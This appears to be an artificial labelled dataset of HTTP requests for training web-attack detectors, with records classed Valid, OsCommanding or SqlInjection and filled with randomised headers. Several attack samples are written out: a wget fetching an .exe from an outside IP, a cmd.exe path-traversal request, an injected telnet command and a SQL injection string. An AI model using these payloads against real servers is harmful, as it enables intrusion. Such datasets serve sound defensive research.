Cookie: w2cpni=ttosSa|scriptex-edd0 1 wm;N68toeohpgosl=rht~;araha=e@S3azkkFr;ran0rorpn=Chnei;jetu9Rzugrhj6Un=8;vhS=Sdsuean
Cookie2: $Version="10"
Date: Thu, 02 Sep 04 24:00:49 GMT
ETag: W/"ks5gb@SECqcr6yCST0"
Expect: et9a
From: ers7@stiihe.com
If-Modified-Since: Sun, 24 Aug 08 19:40:18 GMT
If-Unmodified-Since: Thu, 14 Dec 06 08:44:16 CET
If-Match: "l6AOyMpnLe7wdrTMmUv"
If-None-Match: "0GT9GqGCp0xq_sGjVF"
If-Range: *
Max-Forwards: 203
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWhpb2l0Z3JlV3FvYXIzd2NtZGFzVUwyaU5kMmVyb3RkdzZodWg5Ymk=
Authorization: Digest realm
Range: 1976-
Referer: /wimisN.jpeg
TE: gzip;q=0.0,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 7.8; qt-nw; rv:5.3.4) Gecko/82831289
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 221x4182
Via: FTP/0.6 www.dnai.jpeg
Transfer-Encoding: gzip
Upgrade: ereinf/3.5, eEt0/2.9, zrTT/7.8, hta/4.0
Warning: 962 www.banl.css "pnseoesh" "Fri, 16 Jan 09 06:00:56 GMT"
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 0543999319817911662
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22130
Start - Id: 3964
class: Valid
POST /ij/nGpv48pLGAo.mdb? HTTP/1.0
Content-Length: 252
Content-Language: h,3aa1
Content-Encoding: gzip
Content-Location: /ittnuo/oejonrae.mdb
Content-MD5: WHM2aGlvYmFldWhhY2llaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Sat, 11 Jul 09 05:58:51 GMT
Host: 33.234.248.85
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: t5o='tge6'
Client-ip: 114.19.79.51
Cookie: demt=5950161;turaopten=77;dmTns0adg=smmeUuo6VcK;APVo=03950;bx3aaio=mhae5t
Cookie2: $Version="3"
Date: Mon, 30 May 05 24:40:44 UTC
ETag: "cRPrR_WMKHJ7ipmhoi"
Expect: rd0e
From: nlsirS@iuLqmfser.st
If-Modified-Since: Mon, 18 Jul 05 02:22:51 GMT
If-Unmodified-Since: Wed, 09 Apr 08 05:02:59 CET
If-Match: "t-F0P7VF5xKAuWbK-P@Z"
If-None-Match: "rqinvu6@k4fmNeq8bfD"
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 9718
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: NTLM Y3NybGFoak1kYWhpbnNkVW95SGRzb3QwU3NoZWVhOW5lM29PcHU3dHM=
Range: -1776
Referer: http://p3dzesX.org/haetz.tar
TE: trailers,gzip;q=0.3,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: aEendn0nae/2.8.6.1.3
UA-CPU: Sparc
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: 3.2 www.4qsa.tiff
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 434 www.wEtTb.jpeg "tsctuawhe" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~

hosfrtie=@e&a4joeomcfcte=d45i9s&soh=546&nilne6doscafo=9701&kntniih=<ieto0dps|eh5i;e&Q9fJrxDv7hA-=Derndeealmorgtsru&h2oeds=9507119&edlcadzeeo=open&usb1fg=sc7&ehduleenersrSt=dyt&4RFc=w&axdGardbsr5sdx=o&hsrtynntpSet=Edi+e&lheochtunI1iaIo=1710839

End - Id: 3964
Start - Id: 9563
class: Valid
GET /SnRle/adEescedbywu2hetiro/lWlem9ww0WKxHaCG9-o/syL-ZEC-jL6k/kqes.d-J8.jpeg?P-4x=eaDjN_JsFdC_&nobeewntHmtzer3=E+&Bp=247&deyhehWprOkTya=tc%5Dtmp&zdheaktuo=tU9&jenOriKf7kq=19318295&Ac1Iir=St HTTP/1.1
Host: www.t8asjet.biz
Connection: rale
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: els4-peemsrd;q=0.6, ttmirry-nxsio, tahgin-og
Cache-Control: no-transform
Client-ip: 21.67.144.205
Cookie: sttxtfELl=hmnee2eaD;oe1ekmvsptIi=oJSZMXJ;8oNemhtdc6nOe=ssNwrniraqt
Cookie2: $Version="795"
Date: Sun, 28 Oct 07 23:27:20 CET
ETag: W/"N02s2cno3jyZhNoqZ2X"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Tue, 24 Oct 06 08:15:02 CET
If-Unmodified-Since: Mon, 18 Jul 05 16:35:15 UTC
If-Match: "tLH2kmhhwdOtouS2.Z"
If-None-Match: *
If-Range: Mon, 23 Mar 09 21:44:57 UTC
Max-Forwards: 1
MIME-Version: 3.3
Pragma: r8ies=lic
Proxy-Authorization: NTLM M1J0aGVic3RxdHBodGxsc3RuYW5wZThpcnBkYWhtZnNoZXRuYWhGZWpjYQ==
Authorization: e41ge viLBEzL=tI7t
Range: 9-,-049
Referer: http://ptN2n.biz/oEhnd/63to/Eexnllo/4nqGdn/landen.png
TE: trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 3.3; pt-6r; rv:9.0.8) Gecko/08543999
UA-CPU: x86
UA-Disp: 815,4431,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1124x1179
Via: HTTP/4.7 www.urz3e.jpeg, 5.1 37.93.96.105
Transfer-Encoding: identity
Upgrade: sedo/1.4, 3hCeos/4.4, ogizca/4.5, eua0oa/1.5
Warning: 523 246.204.1.115:03 "nsxecdawbe" 
X-Forwarded-For: 215.37.23.155
X-Serial-Number: 2426894
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9563
Start - Id: 43618
class: OsCommanding
PUT /rUtjYxOC/n9/5wiqdcIbebc/tehDr8/tjiers/ja9onau/r-sgLA/ttdd5Foqe/oS8K@.0IKW@/PIHNU4A3Xe/fN2h/heLmuuoendef.gif? HTTP/1.0
Content-Length: 78
Content-Language: irmbyrh,exlstMe5
Content-Encoding: deflate
Content-Location: /Elst/Hsgl/n0eni/jef4ti.swf
Content-MD5: Y2tyODloYWVwaWNhb25jcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Nov 06 13:39:27 UTC
Last-Modified: Wed, 08 Oct 08 21:57:14 GMT
Host: www.GrloSh.be
Connection: taeilde
Accept: */*;q=0.1
Accept-Charset: x-mac-greek;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 242.4.203.84
Cookie: gpysv4oe0ef=t?q;Kinclude5ecNyhg=eesi?;dAimgzgRsock_streamLL_=fnjIt7;hrapozihtnceNoe=sh 7;;6NecsynpxbRe=141;droiuashd=2033235
Cookie2: $Version="35"
Date: Tue, 01 Apr 08 07:39:47 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: ihse@2d96a.de
If-Modified-Since: Wed, 12 Jan 05 07:06:59 CET
If-Unmodified-Since: Thu, 21 Jul 05 23:50:36 GMT
If-Match: "AqMCW3xEXA5xLdb"
If-None-Match: "bS64XQ@FMM274TrH"
If-Range: Sat, 03 Apr 10 05:36:18 UTC
Max-Forwards: 100
MIME-Version: 3.1
Pragma: Goea='hl0u1y'
Proxy-Authorization: Basic Y2xzaWhoOnRlYXQ=
Authorization: NTLM YXZwbGhyZWUxOW9laWxvaW9tZjNuZWFwYW5yWXJpb3h3ZXJj
Range: 559-01519,-1,07-
Referer: /kthrzhtR/Sehonde/bTnaase/betufiew.txt
TE: deflate;q=0.5
User-Agent: \n     wget  http://88.132.233.90:77926/nftp.exe
UA-CPU: PowerPC
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: 2.8 www.wo8oeCds.jpeg, 2.7 www.pseigaal.jpg:8431
Transfer-Encoding: compress
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 203 www.i7bgteAE.htm "IsqHs" 
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 3989371
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bipsknan3Oeln=0&B113qGgVgnode=mee&sanboi=938&Jmpp=4796706&twmiauquiS5l='k[

End - Id: 43618
Start - Id: 44156
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.Mheetv8sa.gov
Connection: close
Accept: audio/basic;q=0.7, application/zip;q=0.3
Accept-Charset: cp-950;q=0.0, utf-8, x-mac-chinesetrad;q=0.7, windows-1257, koi8-r;q=0.3
Accept-Encoding: *
Accept-Language: ZeetyAiI-SclhiGT;q=0.2
Cache-Control: min-fresh=54348
Client-ip: 5.92.107.40
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="971"
Date: Fri, 21 Dec 07 07:15:27 GMT
ETag: W/"MsiFE@faBgslkNVRQxH"
Expect: wzoajpob=ltbiem;tOrhtt7
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Thu, 18 Jun 09 16:02:43 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 880
MIME-Version: 7.5
Pragma: N=sy
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: /qntp.dll
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/3.4 (X11; U; Linux i586 7.1; Cr-tr; rv:2.2.0) Gecko/60998191
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: HTTP/9.8 105.198.217.127
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 315 250.26.253.55 "aaeakdwosbfa" "Wed, 07 Apr 10 16:10:50 GMT"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44156
Start - Id: 16118
class: Valid
GET /miFEK2ACB3Ol_6u/iu0ey0pOv24jkpIbLblX/l@4.7EevtklL/cY2j/w7Uku@BR-XgYcTzn/t7taDwhnldjs/MCnetcatiMD/msp8Aqeotndep24cneen/nueiWted/7jhepse.mdb?tayetwgsryl=fx&tn=tuIs%24mnernca&asrdedpeoei=5908666&x27iozeu=rTauoo5tligotx&tetStOstynsse=ohs%5Do%3Fa+raz%3Cint4kuaf&eUlxiitsDnl=t%2BRw-&hron5elaqajtadn=dn3&rlelthqngj=31&oqaei2Rs7asur=r0 HTTP/1.0
Host: 171.197.152.220
Connection: keep-alive
Accept: application/*, application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.6, gzip;q=0.2, deflate
Accept-Language: dqattnoC-fnnu
Cache-Control: min-fresh=8461
Client-ip: 204.40.193.158
Cookie: cpsdh5Ngtnc=8gst;bJ5C5=86911;xmnU5s8ath=73htna f
Cookie2: $Version="7"
Date: Thu, 01 Sep 05 07:57:48 GMT
ETag: "lZl2xD8-_161cHGwhb"
Expect: 100-continue
From: c2a1pa@8itiJl.de
If-Modified-Since: Sat, 08 May 04 20:02:29 CET
If-Unmodified-Since: Sat, 08 Jan 05 17:26:49 GMT
If-Match: "EMjGf1rwmXZCPopS"
If-None-Match: "km201qEctfLtT8b"
If-Range: *
Max-Forwards: 09
MIME-Version: 8.0
Pragma: fcn1a4p='a'
Proxy-Authorization: Digest uri=/ttihrsz/Tptn/rLV8/veluwm.js
Authorization: Basic YWVjbTpsYVljZmVk
Range: 303812-992,8-0,-1
Referer: /cndc/tehro4t/uhAhoiEe.zip
TE: deflate,gzip
Trailer: Connection
User-Agent: wbgstra/1.5.4.9.5
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4140x4561
Via: 3u7eai/7.4 www.atbt.jpeg
Transfer-Encoding: Mdtd5r
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16118
Start - Id: 34582
class: Valid
POST /Wpasswd/sxutApmro5h/h3gMm6t038k/lru/ib4JQDitnGuDkhSGmb/eaodpTAeORtRL8Hsaivo.jsp? HTTP/1.1
Content-Length: 99
Content-Language: ea,XR
Content-Encoding: identity
Content-Location: http://eenhpAs.fr/92eseemg/uptnpk/untacaec/fsit/lrtrth.tar.gz
Content-MD5: YWF0YWI0ZXJhcDVjbG5SOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Sep 06 14:16:05 GMT
Last-Modified: Sat, 16 Jun 07 07:22:24 GMT
Host: www.7ueaG.gov
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, gb2312;q=0.4, iso-10646-ucs-2;q=0.4, gb2312
Accept-Encoding: *
Accept-Language: rcvKgwn9-pEo1men;q=0.6, sbnori-i;q=0.9, sHubnqft-f;q=0.8, hele6z-kl9g;q=0.2
Cache-Control: min-fresh=1
Client-ip: 161.213.155.170
Cookie: rcs=e51i oes i98l e;uoOts0ln=r0Lh9ulltmh4r1;8xhi=02;esrsBNgiSeT=tltetWFooa )o
Cookie2: $Version="5"
Date: Fri, 05 Oct 07 17:13:06 UTC
ETag: "0HqDSBh.Wpdg61sLLkXC"
Expect: 100-continue
From: Oaodnbea@frlfa.ch
If-Modified-Since: Fri, 24 Nov 06 15:42:28 UTC
If-Unmodified-Since: Fri, 27 Aug 04 10:28:09 CET
If-Match: *
If-None-Match: "bISCGwvaLBhQdwGRuM8"
If-Range: "mw.NWwoxlcuip_hSkzPI"
Max-Forwards: 13
MIME-Version: 1.5
Pragma: 7ys='tw0'
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: NTLM U2F0ZXpvNGRlYW9JZGR0bWVjdG53MnVyb3V0bmRoY3Q=
Range: 1867-,-2727
Referer: http://dQIesta.com/a7c8Cdgu/nvacz.swf
TE: gzip
Trailer: Date
User-Agent: oCzBpZyjk http://www.748I.biz
UA-CPU: PowerPC
UA-Disp: 518,1124,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 512x9817
Via: FTP/9.3 170.255.177.186, FTP/1.7 0.82.62.190, FTP/0.1 www.2eOtoh.htm
Transfer-Encoding: anen
Upgrade: Qodwe/1.4, 5thx7/5.2, EeTnts/6.6
Warning: 167 www.rhqsT.css "8mTr" 
X-Forwarded-For: 7.90.1.179
X-Serial-Number: 8498191575866
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fiqgoEdo=1OfD&steo=i&ZNiea=be&eEZ4G0=a0jnHj4HuK&lttoNtaTiduT0i=96&sTdNtdndlat5=sta&rhtoywdn=8088003

End - Id: 34582
Start - Id: 18676
class: Valid
GET /rO/dCU/te9ix/a4alntcimno971aahg/8loh7e/orwp-sinputyyYCb2qmea5/wt2esHextnz7zenni/71dgtIh/dhhh1Er0/eWtJ.fiqrAshv-.mdb?mO=9a%26&E0hlIeNb9ntona=37599&eedBoob=n+orbe&aT-9J5Fay=04857&i7e=yma+eha%3Esatsba&oojgwhR=%3AuiLn1%40taEdnrps&cstarY1teple=eagFMu0&2auRtI3Nrorlo=tt%2B&oitvstmr=ens&hbott=139671&sih4zeT2dltrtec=qQ2hud&earztmvptpeft=eltntcbghhtigd&tRa1vAAntoi3=+iframe2perl6mere8wSd&uebsewoOp=dcopyiem&e4=zcoOe HTTP/1.0
Host: 154.95.42.13
Connection: a25G
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=26216
Client-ip: 235.32.209.124
Cookie: saszmuya=9;jdxddaalila6te=ysk_Ai3rQtH;4jertjo=oz1e;astoctr=394004303;tbyntne1=h;ce=asystemo>a
Cookie2: $Version="59"
Date: Sun, 22 Jan 06 11:10:48 GMT
ETag: W/"sDYaiLc2SXxpEpnuQPw"
Expect: 100-continue
From: hloyosxc@tEpaaeg.de
If-Modified-Since: Sun, 27 Feb 05 03:23:27 CET
If-Unmodified-Since: Fri, 21 Oct 05 05:00:32 UTC
If-Match: "D7LKokrJFFl7ZatD"
If-None-Match: *
If-Range: Sun, 29 Mar 09 24:20:47 GMT
Max-Forwards: 613
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ZUhoaHRrZVJsaGVicGJzelFzSWZoZGV1c3JpUzBzdG5ycmxpNGJhOGRuaWxidG4=
Authorization: Digest nc=9bedeAFe
Range: -745
Referer: http://www.noa9ar8t.be/ena3/bsrn2c.js
TE: gzip;q=0.7
Trailer: If-Match
User-Agent: m6hT (dx@-FKX; iE5HrKAiw)
UA-CPU: MIPS
UA-Disp: 8675,230,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8595x9488
Via: 5.2 213.61.250.148:33, hchEe/5.5 164.241.251.33, HTTP/5.2 www.oh4e.jpg
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 241.151.124.130
X-Serial-Number: 04013
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18676
Start - Id: 19576
class: Valid
GET /GM3u/b1yJbVJK/ad6WtG9MxyhlsibJhOwa/du/kUP/raoes4ctosmed1co/3l/r@y3o9Z.jpg?7reqelnwsae=n_RnFBWg&rddreBeh=t6D1%40Bl.jF6&tygo7eder=sdg&ebeTc5bw6hton=2&nahdirvatahs=6ennRrceEhmseeeh&sOyea9iam=equ&maih9tsrjFuGnm=disbeo&o64alm8=He0ti8h6aclhssi&xslu=13 HTTP/1.0
Host: 86.87.112.148
Connection: Pnactne
Accept: application/*
Accept-Charset: x-mac-arabic, gb2312, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 35.35.102.53
Cookie: ScOa2VdzM=ooeerttreaTmp
Cookie2: $Version="632"
Date: Wed, 04 Oct 06 10:13:35 CET
ETag: "QkcDEtk-s4R76tQuNSU"
Expect: nspk=rhnyms
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 05 Jan 06 01:41:54 GMT
If-Unmodified-Since: Wed, 13 May 09 09:29:57 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Oct 07 12:37:12 CET
Max-Forwards: 2036
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Basic ZXZ3cnJveHc6SHRpdHJo
Range: 187147-0990,76-,-590377
Referer: http://osaE.gov/etgpts/i1m9p.png
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/9.3 (compatible; MSIE 2.7; Mac OS X; aaqyrh; rreyaAa; mzhi1eN8h)
UA-CPU: MIPS
UA-Disp: 187,0883,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4605x2042
Via: HTTP/6.0 www.elezd.jpeg, t2q/8.1 www.nrde8uhl.shtml:3, ins0h/4.9 www.ang0.css
Transfer-Encoding: gzip
Upgrade: tecthp/7.8
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19576
Start - Id: 20779
class: Valid
GET /45jotth/m3/l9r/jTEnHsZU1/eSk0/na/6DtFvgD9TK5_aELNLV/b1zs6S1gS.shtml?alK0ts8neyh=oZHggsp&roeyimdo0=95392&hsyJet627sssy=aeer8adltgbtL&gallYaupdateDIz=rHxAEWRq&3dnloc2ncmembod=rZFxj&encahnnS4naaudb=9738&onEs=bto&Iiieiela4ttE7u=84&Eaifreo=796848 HTTP/1.1
Host: 240.37.200.102:066
Connection: edr2ha
Accept: audio/*;q=0.9, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: q-i;q=0.3, i3oluer-dnpkha, a2i-eqaS;q=0.7
Cache-Control: only-if-cached
Client-ip: 132.58.67.73
Cookie: imgmpMformydvQPim=dexec;tbrnunhn=0739451704
Cookie2: $Version="001"
Date: Sat, 25 Sep 04 22:41:51 UTC
ETag: W/"L3YjBHgs1M8e2DeRG"
Expect: Reeyl
From: txeT@aevntoegn.com
If-Modified-Since: Thu, 03 Jun 04 15:50:58 CET
If-Unmodified-Since: Mon, 30 Oct 06 09:05:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Nov 06 06:19:08 UTC
Max-Forwards: 170
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: Digest realm
Range: 68-16
Referer: http://sq8uaia.be/fw1bwz3t/tSe8irlO/6ttf/aScd.dll
TE: gzip,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/1.3 (compatible; Konqueror/0.9; WinNT; jartmlb)
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: 6.7 www.dihjcI.png, FTP/3.9 www.urrra.shtml:162
Transfer-Encoding: gzip
Upgrade: ichhc/3.2
Warning: 871 www.ryuuaerc.shtml "ayteeudhmseta" "Sun, 11 Oct 09 20:53:16 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 0880116781853820645
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20779
Start - Id: 43467
class: OsCommanding
GET /eGuXKtQOQ1MD/50XVVtmpDBFje/ctJEt2yNL_G@NkO.shtml?lXo9XcfjJQlso=eod6oet&o_5O_VallkSGselect=oiwm&sga7=nat%29senpi%3Bmth&relego=ld8mgroup+bybe0oenetcat+ps&twhereNmocha2window.openfc4Cy=xs&sri8sedReanod=%22++++%3B+++telnet+++++28.59.239.152+++80+++++%3B&eaedteitbd=l&oSegWCr=9500 HTTP/1.0
Host: 0.226.107.209
Connection: stiN
Accept: audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.5, gzip;q=0.6, identity;q=0.9
Accept-Language: dfSodtm-iu9;q=0.3, ada-3
Cache-Control: only-if-cached
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="64"
Date: Thu, 08 May 08 17:27:46 CET
ETag: "W_D-MMI1DqBWzuzV"
Expect: 100-continue
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 13 Jan 10 04:11:00 CET
If-Unmodified-Since: Thu, 26 Feb 04 19:20:38 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jan 08 02:41:32 GMT
Max-Forwards: 34
MIME-Version: 6.8
Pragma: eeez=9Nh
Proxy-Authorization: Digest username="ncuenm"
Authorization: dekroo seikman=bkoh1n
Referer: /Blht3yeo/ncedy/aAsAeOai.mdb
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 5.4; as-tb; rv:7.7.7) Gecko/47712521
UA-CPU: Sparc
UA-Pixels: 828x8678
Via: 9.2 www.faOrhsnx.jpeg
Transfer-Encoding: gzip
Upgrade: tgIia/4.5, tqrgN/1.9, ioi/4.3
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43467
Start - Id: 35238
class: SqlInjection
GET /ywhereD.etc0passthrukXK2Q15w/tlkwqmwalDhegg/ri/z5twlEJOb0/3n1vX0raGn15/FAljliEiatasN/o2cNvmU-45eH/neynoSnswhfsi.pl?ifnmnhjahof=119664&Nlt9cpf=nzw--rmf2.h&ed7o=e+si&fnnlttta=cupdatet&2koapQ=860153&rrt=3237356&7tpE5OCADe4=iTuueoykieedrx2ew&ipaeaoa=and3&tl4hn1=dtr&fps9otni=e4fytiNconnectddecatt&3npuedritpt=%27++++OR+++%27%27++%3D%27&adTtacnsL=82068&pao3Hh3grpexIh=xEW&nAm3odr=fpnndlnssE2edhnm HTTP/1.0
Host: www.7hus.cz
Connection: close
Accept: application/*;q=0.5, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 61.19.198.20
Cookie: ID8Oe2where=eta :rk;W0deq_0-tj=o569;5todrwo0esix=rn9SY-BgIG
Cookie2: $Version="55"
Date: Thu, 21 May 09 06:55:07 GMT
ETag: W/"nMX2urdi29dkIXdpcQr"
Expect: 100-continue
From: niuRy@wlrqea.com
If-Modified-Since: Sat, 15 Mar 08 03:54:00 GMT
If-Unmodified-Since: Sat, 14 Nov 09 10:32:54 GMT
If-Match: "dhw15933UJpsvGj@F"
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 301
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: Digest nonce
Range: 233007-
Referer: /ial4Tc6s/srftmeot/sbiwtdhe/easochd6/PdTpa9.bin
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: E2l67mni/8.9.1.3.7
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 5.2 231.32.133.3, 8.4 www.ulTraa.js
Transfer-Encoding: compress
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35238
Start - Id: 4928
class: Valid
PUT /wpbeAaHd/ctl0tneg4ooyd5ttto/.RUwm04perlp7e_/M-W/IcUJWfl5/h1G6nQbmejKshutO_T/rfjFcPI/oS2tke1iihchil/ISt2.html? HTTP/1.0
Content-Length: 279
Content-Language: t0ot
Content-Encoding: identity
Content-Location: /eani/oagvony/stab/deaNrwea.fgf
Content-MD5: aGFTYWFpM2Zvc2dlYW5lbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Mar 09 10:35:59 CET
Last-Modified: Thu, 29 Mar 07 21:55:58 CET
Host: www.Yoafih.net
Connection: hotsanp
Accept: audio/x-wav, video/*;q=0.9, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3m-w, ogrdmeT-kylo
Cache-Control: nynt=mEHeOeh
Client-ip: 47.100.65.174
Cookie: 3etw=914
Cookie2: $Version="0"
Date: Sat, 01 May 04 21:17:25 CET
ETag: "JYaoY47Q5h@FL5ye"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Mon, 02 Feb 04 09:11:40 UTC
If-Unmodified-Since: Fri, 22 Jan 10 11:28:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: wzli oidyhh=hqrhptA
Range: -50,-681
Referer: http://dsBq.net/thtees/loFintp/c6esgr/rwoA/dr4unrsI.wav
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/6.9 (compatible; MSIE 8.2; Windows NT; aAswire)
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: 2.4 www.hnes1.jpg:344
Transfer-Encoding: gzip
Upgrade: 3ttOso/1.8
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 81307487513405
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

movtTqklmp6pW=dhttps46&Al=Dnep|vnodes\fqfr&innv=acsiox&doereR2imuihx=094&ee=ohpcU@SUNd7&3neoofunl=601466&eer=nlphpxsc+-47connectj@x&0pTr96aeelka=hnSlachn9odIpaas&trgauoRcfe=p@SjAEWFV&ro7ARhttpik=562591&latoaoe2i=67410563&kazaoR6cse=seaejoednzutSf&tje=75&yt=7Zd9_zO-Tm

End - Id: 4928
Start - Id: 34592
class: Valid
PUT /tzCUf/rhRscsunapo4seefhtaa.cfm? HTTP/1.0
Content-Length: 189
Content-Language: oarTomr,zeRTeji1,4hmyend
Content-Encoding: identity
Content-Location: http://www.wbd2u.cz/aIMenai.php3
Content-MD5: M256dGVsc2FzQ0VhZWNlYQ==
